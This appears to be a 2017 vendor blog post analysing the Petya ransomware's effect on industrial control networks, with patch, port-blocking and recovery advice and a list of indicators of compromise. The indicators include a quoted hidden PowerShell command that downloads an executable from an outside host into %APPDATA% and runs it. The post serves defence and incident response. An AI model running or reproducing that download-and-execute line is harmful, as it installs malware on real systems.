The Claroty Blog

Petya Ransomware Analysis - Impact on ICS Networks

| Patrick McBride

INITIAL ANALYSIS (1:40pm EDT - 6.27.17) - CHECK BACK FOR UPDATES

A very rapidly propagating ransomware campaign is unfolding today - using ransomware named Petya, it  has been hitting networks globally including many across critical infrastructure domains.

The malware is similar to WannaCry but leverages other techniques to propagate and encrypt systems.

Our initial analysis suggests that Petya’s potential impact on ICS networks appears to be more severe than WannaCry due to the following:

  • Impact on ICS Windows machines: Petya does not encrypt files one by one per a matching extension list, but encrypts the master file table (MFT) so that the file system is not accessible-effectively bricking the machine.

    This means that any infected HMI would be locked immediately. While this would not directly impact the underlying process, it would deprive all visibility and monitoring capabilities which would lead in most to all cases to shut down. The OT network would have to stay in manual mode until recovery of the infected Window endpoints. Further, other SCADA components e.g., historians, backup servers and engineering stations would also be impacted.

  • Propagation: Petya’s propagation capabilities surpass those of WanaCry, as it leverages the user’s privilege to propagate throughout the network (using PSexec). It also utilizes WMI as a propagation vector.

 

Permanent mitigation steps are similar to WannaCry.

  • Patch the following CVEs
    • CVE-2017-0199 
    • CVE-2017-0144
  • This will protect against only one of the prorogation vectors (SMB) and HTA.

 

Additional Protection and Recovery Steps:

  • Block SMB & WMI port 135, 139, 445,1024-1035 TCP - if possible
    1. NOTE: Some ICS software relies on these services so this can impact operations.
    2. Customers can use the Claroty Platform to determine if their current ICS environments are leveraging these ports/protocols.
  • Block execution of .exe within %AppData% and %Temp% as a temporary measure to avoid infection until other mitigation steps can be taken. This may cause issues – for example it will impact installers, but provides temporary relief until other mitigation steps can be taken.
  • Check logs for IOCs below
  • If infected:
    1. Try to avoid reboot. Shutdown –a to abort the shutdown and preserve a copy of the MFT table from memory for recovery. (cmd /k shutdown -a)
    2. Try not to format the encrypted systems but rather get its image for use in recovery steps.

Indicators of Compromise (IOC)[1]

 

File Name            Order-20062017.doc       (actually RTF with CVE-2017-0199)

MD5 Hash Identifier       415FE69BF32634CA98FA07633F4118E1

SHA-1 Hash Identifier     101CC1CB56C407D5B9149F2C3B8523350D23BA84

SHA-256 Hash Identifier                FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206

File Size                6215 bytes

File Type              Rich Text Format data

 

Connections

84.200.16.242     80

 

h11p://84.200.16.242/myguy.xls               (actually HTA)

 

File Name            myguy.xls

MD5 Hash Identifier       0487382A4DAF8EB9660F1C67E30F8B25

SHA-1 Hash Identifier     736752744122A0B5EE4B95DDAD634DD225DC0F73

SHA-256 Hash Identifier                EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6

File Size                13893 bytes

File Type              Zip archive data

 

mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') ;)

   10807.exe %APPDATA%\10807.exe" " (PID: 3096)

 

File Name            BCA9D6.exe

MD5 Hash Identifier       A1D5895F85751DFE67D19CCCB51B051A

SHA-1 Hash Identifier     9288FB8E96D419586FC8C595DD95353D48E8A060

SHA-256 Hash Identifier                17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD

File Size                275968 bytes

 

Communicates to: 111.90.139.247  80

 

[1] https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759

 

Subscribe to Email Updates